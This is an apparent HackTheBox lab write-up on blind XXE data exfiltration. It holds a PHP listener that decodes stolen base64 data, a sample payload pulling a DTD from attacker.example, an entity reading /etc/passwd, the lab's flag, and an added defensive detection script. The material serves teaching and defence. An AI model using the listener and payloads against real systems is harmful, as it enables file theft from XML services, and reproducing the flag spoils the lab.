Huy Phu

Summary

This article discusses a method for performing blind XXE (XML External Entity) attacks to exfiltrate data from a target machine without relying on error messages or output from XML entities.

Abstract

The article builds upon a previous post that covered error-based XXE attacks. It details an approach for out-of-band data exfiltration where the attacker does not receive direct feedback from the target system. The method involves creating a malicious XML entity that requests sensitive files, such as /etc/passwd, and encodes them in base64. This entity is saved in a blind-xxe.dtd file and hosted on an attacking machine. The attacker then sets up a PHP server with a script to decode the incoming base64-encoded data. Using Burp Suite, the attacker injects a payload that points to the malicious DTD file. If successful, the target system's sensitive data is logged on the attacker's server. The article demonstrates how to obtain the flag from a specific section of the target machine by modifying the request file and using the same payload, ultimately revealing the flag HTB{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}.

Opinions

  • The author emphasizes the effectiveness of out-of-band attacks for exfiltrating data without needing error messages or direct output from the target system.
  • The technique is presented as a viable method for obtaining sensitive information from a target machine, such as user credentials and flags in penetration testing scenarios.
  • The use of base64 encoding for data exfiltration is highlighted as a means to bypass certain security controls and filters.
  • The article suggests that attackers can automate the decoding process with a simple PHP script, streamlining the data retrieval process.
  • The author implies that security professionals should be aware of such attack vectors and implement appropriate measures to mitigate them, such as disabling external entity processing and monitoring outbound traffic.

HackTheBox — Web Attacks: XXE with Blind Exfiltration Data

In my previous blog post, HackTheBox — Web Attacks: Error Based XXE to exfiltrate data, I went over the scenario in which we take advantage of web applications displaying error messages to exfiltrate data from the target machine. In this blog post, I will go over how we obtain information even when we neither get the output of any of the XML entities nor get any PHP errors displayed.

Out-Of-Band data exfiltration

The technique used in this scenario is an out-of-band attack, which makes the target communicate with our attacking machine.

First, we create an entity that requests the resource we want to obtain, save it in a blind-xxe.dtd file, and host that file on our attacking machine (the DTD is shown as an image in the original post).

The entity file requests the file /etc/passwd and base64-encodes its contents.

Then I write a small script, index.php, to automatically decode the strings once we receive them.

<?php
// Listener side of the exfiltration: the target's XML parser requests
// http://<attacker>:8000/?content=<base64 data>, and this script decodes
// the value and writes it to the built-in server's log (stderr) instead
// of echoing it back in the HTTP response.
if (isset($_GET['content'])) {
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

Run PHP's built-in web server on the attacking machine:

php -S 0.0.0.0:8000

In Burp Suite, inject the payload that points to the hosted blind-xxe.dtd file (the request is shown as an image in the original post).

If the attack is successful, we should get the content of /etc/passwd from the target machine.

Using a similar technique, we can obtain the flag for this section by modifying the file that the DTD requests.

We keep the same payload and resend the request. We should then get the flag from the specified file:

HTB{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}
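The two places a defender can see this technique are the inbound request body (the DOCTYPE and parameter entity that pull in a remote DTD) and the outbound HTTP request that carries the base64 blob to the listener. The following Python script is an added example, not code from the original post: it scans request bodies for the DTD constructs an XXE payload relies on, triages them, and spots a long base64 query value in a constructed access-log line. The sample XML bodies and log lines are constructed here; the host attacker.example, the port and the parameter name are assumptions used only for the samples.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# --- Constructed sample inputs (not taken from the original post) --------
BENIGN_XML = '<?xml version="1.0"?><order><item>book</item><qty>2</qty></order>'

# Outer shape of a blind payload: a parameter entity that pulls a DTD from
# another host (hostname/port assumed). The hosted DTD is not reproduced.
EXTERNAL_DTD_XML = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % ext SYSTEM "http://attacker.example:8000/blind-xxe.dtd">
  %ext;
]>
<data>x</data>"""

# Classic in-band variant: a general entity that reads a local file.
LOCAL_FILE_XML = """<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>"""

# Constructed access-log lines in combined format; the exfil line carries a
# base64 blob in the 'content' parameter, as the post's listener expects.
SAMPLE_PASSWD_LINE = b"root:x:0:0:root:/root:/bin/bash\n"
EXFIL_LOG_LINE = ('10.10.14.2 - - [01/Jan/2024:00:00:00 +0000] "GET /?content='
                  + base64.b64encode(SAMPLE_PASSWD_LINE).decode() + ' HTTP/1.1" 200 -')
BENIGN_LOG_LINE = ('10.10.14.2 - - [01/Jan/2024:00:00:00 +0000] '
                   '"GET /index.php?page=home HTTP/1.1" 200 -')


@dataclass
class Finding:
    rule: str
    detail: str


_DOCTYPE_EXT = re.compile(r'<!DOCTYPE\s+[^\s\[>]+\s+(?:SYSTEM|PUBLIC)\b', re.I)
_ENTITY_EXT = re.compile(
    r'<!ENTITY\s+(%\s*)?([^\s"\'>]+)\s+'          # optional % marks a parameter entity
    r'(?:SYSTEM|PUBLIC\s+["\'][^"\']*["\'])\s*'    # PUBLIC carries a public id first
    r'["\']([^"\']*)["\']', re.I)
_PARAM_ENTITY_REF = re.compile(r'%[A-Za-z_][\w.-]*;')
_B64_VALUE = re.compile(r'^[A-Za-z0-9+/]{32,}={0,2}$')


def find_xxe_indicators(xml_text: str) -> List[Finding]:
    """Return the DTD-level constructs that an XXE payload relies on."""
    findings: List[Finding] = []
    if _DOCTYPE_EXT.search(xml_text):
        findings.append(Finding("doctype_external", "DOCTYPE references an external DTD"))
    for m in _ENTITY_EXT.finditer(xml_text):
        kind = "parameter" if m.group(1) else "general"
        name, uri = m.group(2), m.group(3)
        scheme = urlsplit(uri).scheme.lower() or "relative"
        findings.append(Finding("external_entity",
                                f"{kind} entity '{name}' loads {scheme} resource {uri}"))
    if _PARAM_ENTITY_REF.search(xml_text):
        findings.append(Finding("parameter_entity_ref",
                                "parameter entity expanded inside the internal subset"))
    return findings


def risk_level(findings: List[Finding]) -> str:
    """Rough triage: any entity that touches a file or the network is high."""
    if any(f.rule == "external_entity" for f in findings):
        return "high"
    if findings:
        return "medium"
    return "none"


def flag_exfil_request(log_line: str) -> Optional[Tuple[str, bytes]]:
    """Spot a query parameter carrying a long, valid base64 blob and return
    (parameter name, decoded bytes); None when nothing looks like exfil."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)\s+HTTP/', log_line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote(raw)  # unquote keeps '+' (parse_qsl would turn it into a space)
        if not _B64_VALUE.match(value):
            continue
        try:
            return name, base64.b64decode(value, validate=True)
        except binascii.Error:
            continue
    return None


if __name__ == "__main__":
    for label, body in [("benign", BENIGN_XML), ("blind", EXTERNAL_DTD_XML),
                        ("local", LOCAL_FILE_XML)]:
        found = find_xxe_indicators(body)
        print(label, risk_level(found), [f.detail for f in found])
    print(flag_exfil_request(EXFIL_LOG_LINE))
    print(flag_exfil_request(BENIGN_LOG_LINE))
```

The request-body check belongs in front of any endpoint that accepts XML, as a WAF rule or an application-level pre-parse filter; it complements, rather than replaces, disabling external entity and DTD loading in the parser itself. The log check runs on egress proxy or web-server logs, where a long base64 parameter leaving the network towards an unknown host is the signal that the technique in this post succeeded.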
